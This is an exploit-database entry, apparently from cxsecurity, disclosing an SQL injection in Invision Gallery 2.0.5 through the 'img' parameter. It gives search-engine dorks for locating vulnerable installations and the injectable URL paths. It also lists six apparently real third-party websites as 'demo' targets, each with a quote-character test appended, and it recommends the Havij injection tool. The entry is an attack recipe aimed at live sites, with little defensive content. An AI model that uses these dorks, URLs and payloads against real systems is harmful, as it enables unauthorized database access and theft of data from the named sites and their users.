Invision Gallery 2.0.5 SQL Injection

2013.01.18
Credit: Ashiyane Digital Security Team
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: inurl:img= or Invision Gallery 2.0.5 IPS, Inc. inurl:img=

############## # Exploit Title : Invision Gallery SQL Injection # # Exploit Author : Ashiyane Digital Security Team # # software Homepage: www.invisionpower.com/apps/gallery/ # # Home : ww.Ashiyane.org # # Security Risk : High - SQL Injection # # version : 2.0.5 # # Dork : Invision Gallery 2.0.5 © 2013 IPS, Inc. inurl:img= or Invision Gallery 2.0.5 IPS, Inc. inurl:img= # ############## #location: site/index.php?automodule=gallery&cmd=si&img=[SQL] # or site/act=module&module=gallery&cmd=si&img=[SQL] # # #DEMO: # # www.sgheadphoXXnes.net/index.php?act=module&module=gallery&cmd=si&img=448%27 # # www.rfdXf.ru/forum/index.php?act=module&module=gallery&cmd=si&img=698%27 # # www.bambuXrakentaja.com/forums/index.php?act=module&module=gallery&cmd=si&img=41%27 # # forum.lacriXmosa.ws/index.php?automodule=gallery&cmd=si&img=42%27 # # www.chXaos.su/forum/index.php?automodule=gallery&cmd=si&img=3 # # ngevacoXrp.freehostia.com/index.php?automodule=gallery&cmd=si&img=726%27 # ############## # [Inject with Havij or inject manually] ############## #Greetz to: My Lord ALLAH ############## # #Amirh03in # ##############

References:

http://www.invisionpower.com/apps/gallery/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top